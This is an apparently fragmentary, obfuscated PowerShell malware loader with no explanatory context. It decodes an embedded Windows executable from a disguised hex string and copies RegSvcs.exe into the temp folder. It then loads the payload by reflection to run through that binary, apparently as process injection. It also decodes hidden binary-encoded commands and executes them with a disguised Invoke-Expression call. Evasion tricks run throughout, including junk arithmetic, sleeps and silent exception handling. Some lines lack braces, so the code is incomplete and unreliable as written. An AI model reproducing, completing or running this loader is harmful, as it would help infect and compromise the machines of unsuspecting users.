} catch { }
start-sleep 3
Function asjdiwWWWW($Yatak) {
$byteList = [System.Collections.Generic.List[Byte]]::new()
for ($i = 0; $i -lt $Yatak.Length; $i +=8) {
$byteList.Add([Convert]::ToByte([String] $Yatak.Substring($i, 8), 2))
return [System.Text.Encoding]::ASCII.GetString($byteList.ToArray())
Function holakabutr([String] $IN) {
$RNBX1 = $IN.Replace('~','000').Replace('%','4')
$bytes = New-Object -TypeName byte[] -ArgumentList ($RNBX1.Length / 1+1+0)
for ($i = 0; $i -lt $RNBX1.Length; $i += 1+1+0) {
$bytes[$i / 2] = [Convert]::ToByte($RNBX1.Substring($i, 1+1+0), 6+10+0)
return [byte[]]$bytes
start-sleep 3
$CLE11 = ''
$CLE11 = 'BinaryChange'
$RNBX1 = '%D5A9~03~~0%~~FFFF~0B8~~~~00%~~~~~~~~~~~~~~~~~~~~~~~008~~00E1FBA0E00B%09CD21B801%CCD215%6869732070726F6772616D2063616E6E6F7%2062652072756E20696E20%%%F53206D6F6%652E0D0D0A2%~~~~0050%5~0%C010300AB8%0563~~~~~0E~0E010B010B~0A~~008~~~~8EBE~~2~~0C~~~%~002~~002~00%~~~~~%~~~~~~01~002~~~~0300%085~01~001~~~1~001~~~~00F~~~~~~~0%0BE~0%B~~00C~00C80%~~~~~~~~~~~~00E~~C~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~002~~8~~~~~~~0082~00%8~~~~~~~02E7%65787%~~9%9E~~2~~0A~~002~~~~~~~~~02~00602E72737263~~C80%~~C~~006~~A2~~~~~~~~~0%~00%02E72656C6F63~00C~~00E~~002~~A8~~~~~~~~~0%~00%2~~~~~~~~~~0070BE~~~~%8~~02~500287B~0%%33~001~~03~0066CAE~0560E~~~~~~~~~~~~~~~~~~~~~~~~~~~~263802~~2616002A~013300%00CC~~01~0113802~~261616280A~0063917~~262003~~3858~~007201~0700A381%~~26200%~~FE0E0%00280B~006393%~~026F0E~00A17590B386~~~0602076F0F~00A8C17~001281~~A0A0717590B38%2~~2003~~FE0E0%00FE0C0%00%506~~8BFFFFFF92FFFFFF18~~8BFFFFFFABFFFFFF33~~2002~~FE0E0%00280A~0063998FFFFFF38C7FFFFFF~716FE0%16FE010D093A92FFFFFF060C2005~~38A8FFFFFF38~~~82A263802~~261600
$tempfolder = $env:temp
$destinazione = $tempfolder + "\RegSvcs.exe"
$Path = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
Copy-Item $Path -Destination $destinazione
Function MyFunciton($Var) {
return $Var.GetType('CALC.PAYSIAS')
[byte[]]$WULC4 = holakabutr($CLE11)
[byte[]]$YIV4Z = holakabutr($RNBX1)
$OKM4 = (asjdiwWWWW("%1%%%1%1%1111%%%%11%%1%1%11%%%11%111%1%1%111%1%%%11%%1%1".Replace('%','0')))
$x1ct = (asjdiwWWWW("0%00%00%0%%0%%%00%%%0%%00%%0%%%%0%%0%0%%0%%00%0%".Replace('%','1')))
$Path = $destinazione
$Path2 = ''
$Path3 = ''
$ncr3 = [Ref].Assembly
$ncrx3 = $ncr3::Load(($YIV4Z))
$TXN4Z = MyFunciton($ncrx3);
$MG5X = $TXN4Z.'GetMethod'($OKM4);
} catch { }
try
} catch { }
try
$MG5X.$x1ct($null,[object[]] ($Path.Replace("%%",""),$WULC4));
$MG5X.$x1ct($null,[object[]] ($Path2.Replace("%%",""),$WULC4));
$MG5X.$x1ct($null,[object[]] ($Path3.Replace("%%",""),$WULC4));
$OASI4 = (asjdiwWWWW("~%%%~~%%~%%%~%~~~%%~~~~%~%%%~~%~~%%%~%~~~~%~%%~%~%%%~~%%~%%~%%~~~%%~~%~%~%%~~%~%~%%%~~~~~~%~~~~~~~%%~~%~~~%%~~%%~~~~%~%~~~%~~~%%~~%~~~~~~%~~~%~~~%%~%~~%~%%%~~%%~%%~~~~%~%%~~~%~~%%~%%~~~%%~~%~%~~%~~~~~~%~%~~%%~%%~~~%%~%%%~~%~~%%~%~~%~%%%~~~~~%%%~%~~~~%~~~~~~%~~%%~~~%%~%%%%~%%~~%%%~%%~~%%%~%%~%~~%~%%~%%%~~%%~~%%%~~%%%~%~~~~~%~%~~~%~~%~~~%%%~~%%~%%~~%~%~%%%~%~~~%%%~%~~~%%~%~~%~%%~%%%~~%%~~%%%~%%%~~%%~~%~~~~~~~%%%%~%~~%~~~~~~%~%%~%%~%~%~~%~~%%~~%~%~%%~~%%~~%~%%%~%~~%~%%%~~%~~~~~%~%%%~~%%~%%%~~%%~%%~~%~%~%%~%%~%~%%~~~%~~%%~%%~~~%%%%~~%~~%~%%%~~%~~~%%%~%%~~%~%~%%%~%~~~%~%~%~~~%%%%~~%~%%%~~~~~%%~~%~%~~%~%~~~~~%~~~%~~%~%~~%%~%%%%~~%~%%%~~%%~%%%~%~~~%%~~%~%~%%~%%~%~~%~%%%~~%~~%%~%~%%~~~~%~%%~%%%~~%%~~~~%~%%~~%%%~%%~~%~%~%%~%%~%~%%~~%~%~%%~%%%~~%%%~%~~~~%~%%%~~%~~~~~%~%%%~%~%~%%%~%~~~%%~%%%%~%%~%%~%~%%~~~~%~%%%~%~~~%%~%~~%~%%~%%%%~%%~%%%~~~%~%%%~~%~%~%~%~%%%~%~~~%%~%~~%~%%~%%~~~%%%~~%%~~%~~~%~~~%~%~~%~~%~%%%~~%~~~%%%~%%~~%~%~%%%~%~~~%~~~%%~~%%~%~~%~%%~~%~%~%%~%%~~~%%~~%~~~~%~%~~~~~%~~~%~~%%~~~%
$OASI4 | .('{x}{9}'.replace('9','0').replace('x','1')-f'lun','%%').replace('%%','I').replace('lun','EX')
$DEF = (asjdiwWWWW("~%~~~~~%~%%~~%~~~%%~~%~~~~%~%%~%~%~~%%~%~%%%~~~~~%~%~~~~~%%%~~%~~%%~~%~%~%%~~%%~~%%~~%~%~%%%~~%~~%%~~%~%~%%~%%%~~%%~~~%%~%%~~%~%~~%~~~~~~~%~%%~%~%~~~%~%~%%%%~~~~%%~~~%%~%%~%%~~~%%%~%~%~%%%~~%%~%%~%~~%~%%~%%%%~%%~%%%~~%~~~%~%~%%%%~~~~%%%~%~~~%%~~%~%~%%~%%%~~%%%~~%%~%%~%~~%~%%~%%%%~%%~%%%~~~%~~~~~~~%~~~%~~~%~%%%~~%%~~~%~~%%~~~~%~%%%~%~~~~%~~~%~~~~~%~%~~%~~~~~%~%%~~%~~~%%~~%~~~~%~%%~%~%~~%%~%~%%%~~~~~%~%~~~~~%%%~~%~~%%~~%~%~%%~~%%~~%%~~%~%~%%%~~%~~%%~~%~%~%%~%%%~~%%~~~%%~%%~~%~%~~%~~~~~~~%~%%~%~%~~~%~%~%%%%~~~~%%~~~%%~%%~%%~~~%%%~%~%~%%%~~%%~%%~%~~%~%%~%%%%~%%~%%%~~%~~~%~%~%%%%~~~~%%%~%~~~%%~~%~%~%%~%%%~~%%%~~%%~%%~%~~%~%%~%%%%~%%~%%%~~~%~~~~~~~%~~~%~~~%~%%%~~%%%~~~~~%%%~~~~~%%~~~~%~%%~%%~%~~%~~~%~~~~~%~%~~%~~~~~%~%%~~%~~~%%~~%~~~~%~%%~%~%~~%%~%~%%%~~~~~%~%~~~~~%%%~~%~~%%~~%~%~%%~~%%~~%%~~%~%~%%%~~%~~%%~~%~%~%%~%%%~~%%~~~%%~%%~~%~%~~%~~~~~~~%~%%~%~%~~~%~%~%%%%~~~~%%~~~%%~%%~%%~~~%%%~%~%~%%%~~%%~%%~%~~%~%%~%%%%~%%~%%%~~%~~~%~%~%%%%~~~~%%%~%~~~%%~~%~%~%%~%%%~~%%%~~%%~%%~%~~%~%%~%%%%~%%~%%%~~~%~
$DEF | .('{x}{9}'.replace('9','0').replace('x','1')-f'lun','%%').replace('%%','I').replace('lun','EX')
} catch { }
} catch { }